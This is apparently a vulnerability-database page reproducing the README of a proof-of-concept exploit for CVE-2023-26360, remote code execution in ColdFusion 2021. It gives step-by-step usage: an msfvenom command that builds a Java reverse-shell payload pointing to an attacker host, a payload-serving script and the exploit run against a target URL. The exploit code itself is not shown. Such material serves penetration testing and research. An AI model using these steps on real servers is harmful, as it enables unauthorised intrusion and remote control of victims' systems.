来源

关联漏洞

描述

Exploit for Remote Code Execution in ColdFusion 2021 (CVE-2023-26360)

介绍

# CVE-2023-26360 - Remote Code Execution on ColdFusion 2021

> Sometimes, the scripts don't work at first attempt. Try a few times to make it work

## How to execute

### Create a payload with msfvenom

```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
```

### Starting `server.py`

- This server will send the payload to the Coldfusion server after the initial access with `cve.2023-26360.py`, so it need to be initialized first.

```
python3 server.py 8000
```

- The argument `8000` is the port that server will be listening on.

- It's important to notice that the line 12 configure the server ip address, so change it:

```
s.bind(('192.168.56.1',port))
```

### Run `cve-2023-26360.py`

- To run the exploit, execute:

```
python3 cve-2023-26360.py 8000
```
- As in `server.py`, the argument `8000` is the port the server.py will listen on. So, it must be the same on both commands.

- The line 8 on `cve-2023-26360.py` sets the ip address of server.py will listen on. It's necessary to configure it correctly.

- The line 11 on `cve-2023-26360.py` sets the ip address of coldfusion server, so change it:

```
url = "http://192.168.56.102:8500"
```


## Tested on
- ColdFusion 2021 - Windows Server 2019

文件快照

 [4.0K]  /data/pocs/efefb33ced37dbc64da9a7092650b1f64e292d77
├── [2.2K]  cve-2023-26360.py
├── [1.2K]  README.md
└── [ 972]  server.py

0 directories, 3 files

备注